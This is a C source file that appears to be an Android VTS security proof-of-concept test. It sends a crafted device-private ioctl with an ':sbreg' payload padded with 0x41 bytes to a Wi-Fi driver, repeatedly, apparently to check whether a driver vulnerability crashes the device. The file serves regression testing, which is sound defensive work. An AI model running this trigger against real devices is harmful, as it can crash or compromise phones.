1 /*
2  * Copyright (C) 2016 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include "poc_test.h"
18 
19 #include <dlfcn.h>
20 #include <errno.h>
21 #include <fcntl.h>
22 #include <net/if.h>
23 #include <sys/socket.h>
24 #include <linux/fb.h>
25 #include <linux/wireless.h>
26 #include <signal.h>
27 #include <stdint.h>
28 #include <stdio.h>
29 #include <stdlib.h>
30 #include <sys/ioctl.h>
31 #include <sys/mman.h>
32 #include <sys/prctl.h>
33 #include <sys/ptrace.h>
34 #include <sys/stat.h>
35 #include <sys/syscall.h>
36 #include <sys/types.h>
37 #include <sys/wait.h>
38 #include <unistd.h>
39 
/* Sizes and iteration count used by this test. */
enum {
  BUF_LEN = 8192,   /* general scratch-buffer size, in bytes */
  IOC_BUF_LEN = 63, /* size of the payload buffer handed to the driver ioctl */
  TEST_CNT = 20     /* number of times main() repeats poc() */
};
43 
/*
 * Buffer descriptor with a pointer and two length fields.
 * NOTE(review): presumably mirrors the Android Wi-Fi private-command
 * structure of the driver under test -- confirm against the driver headers.
 * It is not part of the ioctl request that poc() sends.
 */
struct _android_wifi_priv_cmd {
  char *buf;     /* caller-owned buffer */
  int used_len;  /* bytes of buf in use */
  int total_len; /* capacity of buf */
};
typedef struct _android_wifi_priv_cmd android_wifi_priv_cmd;
49 
/*
 * Three-int record that poc() places in the ioctl payload directly after
 * the 7-byte ":sbreg\0" name. poc() writes only `func`; the other two
 * fields keep the 0x41 fill pattern of the payload buffer.
 * NOTE(review): field meanings are taken from the names only -- confirm
 * against the driver's definition.
 */
struct sdreg {
  int func;
  int offset;
  int value;
};
typedef struct sdreg sdreg_t;
55 
/*
 * Request header passed to the driver through ifreq.ifr_data.
 * poc() fills in cmd, buf, len and driver; the remaining members are
 * marked optional by the original field comments.
 */
struct dhd_ioctl {
  uint cmd;          /* common ioctl definition */
  void *buf;         /* pointer to user buffer */
  uint len;          /* length of user buffer */
  unsigned char set; /* get or set request (optional) */
  uint used;         /* bytes read or written (optional) */
  uint needed;       /* bytes needed (optional) */
  uint driver;       /* to identify target driver */
};
typedef struct dhd_ioctl dhd_ioctl_t;
65 
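/**
 * Sends one driver-private ioctl on interface `ifname` whose payload is the
 * name ":sbreg" followed by an sdreg record, then waits one second.
 *
 * @param ifname  NUL-terminated interface name; must fit in ifreq's name
 *                field including its terminator.
 * @return POC_TEST_FAIL if the name is missing or too long, or if the socket
 *         cannot be opened; POC_TEST_PASS otherwise. An ioctl error is only
 *         logged. NOTE(review): presumably the pass criterion is that the
 *         device is still running after the request -- confirm with the
 *         harness.
 */
int poc(const char *ifname) {
  int fd, res;
  dhd_ioctl_t ioc;
  struct ifreq arg;
  char iocbuf[IOC_BUF_LEN];
  const int func = 1;
  size_t name_len;

  /* ifname comes from a host-side test parameter: bound it before copying.
   * The original copied strlen(ifname) bytes with no limit into the
   * fixed-size name field, which could overrun `arg` on the stack. */
  if (ifname == NULL) {
    printf("interface name is missing \n");
    return POC_TEST_FAIL;
  }
  name_len = strlen(ifname);
  if (name_len >= sizeof(arg.ifr_ifrn.ifrn_name)) {
    printf("interface name too long : %zu bytes \n", name_len);
    return POC_TEST_FAIL;
  }

  fd = socket(AF_INET, SOCK_STREAM, 0);
  if (fd < 0) {
    printf("open socket error : fd:0x%x  %s \n", fd, strerror(errno));
    return POC_TEST_FAIL;
  }

  /* Zero the request first so the copied name is NUL-terminated and no
   * uninitialised stack bytes are handed to the kernel. */
  memset(&arg, 0, sizeof(arg));
  memcpy(arg.ifr_ifrn.ifrn_name, ifname, name_len);

  /* Payload: 7-byte name (":sbreg" plus its NUL), then the sdreg record.
   * Every byte not written below stays 0x41. */
  memset(iocbuf, 0x41, IOC_BUF_LEN);
  memcpy(iocbuf, ":sbreg\0", 7);

  /* sdreg.func is the first member, so it lives at payload offset 7. That
   * offset is not int-aligned; memcpy writes the same bytes as the original
   * pointer cast without a misaligned or type-punned store. */
  memcpy(&iocbuf[7], &func, sizeof(func));

  /* NOTE(review): the original left set/used/needed uninitialised. They are
   * zeroed here so each run sends the same request; confirm the driver does
   * not depend on those fields for this command. */
  memset(&ioc, 0, sizeof(ioc));
  ioc.len = IOC_BUF_LEN;
  ioc.buf = iocbuf;
  ioc.driver = 0x00444944; /* presumably the driver's ioctl magic -- confirm */
  ioc.cmd = 0x2;

  arg.ifr_data = &ioc;

  /* 0x89F0 is SIOCDEVPRIVATE, the first device-private ioctl number. */
  if ((res = ioctl(fd, 0x89F0, &arg)) < 0) {
    printf("ioctl error res:0x%x, %s \r\n", res, strerror(errno));
  }
  sleep(1);

  close(fd);
  return POC_TEST_PASS;
}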
104 
/**
 * Test entry point: reads the "ifname" host parameter and runs poc() up to
 * TEST_CNT times, stopping at the first run that does not pass.
 *
 * @return POC_TEST_FAIL when the parameter is empty, otherwise the result of
 *         the last poc() call.
 */
int main(int argc, char **argv) {
  VtsHostInput host_input = ParseVtsHostFlags(argc, argv);
  /* The pointer stays valid for as long as host_input is alive. */
  const char *ifname = host_input.params["ifname"].c_str();
  if (ifname[0] == '\0') {
    fprintf(stderr, "ifname parameter is empty.\n");
    return POC_TEST_FAIL;
  }

  int ret;
  int round = 0;

  while (round < TEST_CNT) {
    ret = poc(ifname);
    if (ret != POC_TEST_PASS) {
      break;
    }
    ++round;
  }

  return ret;
}
121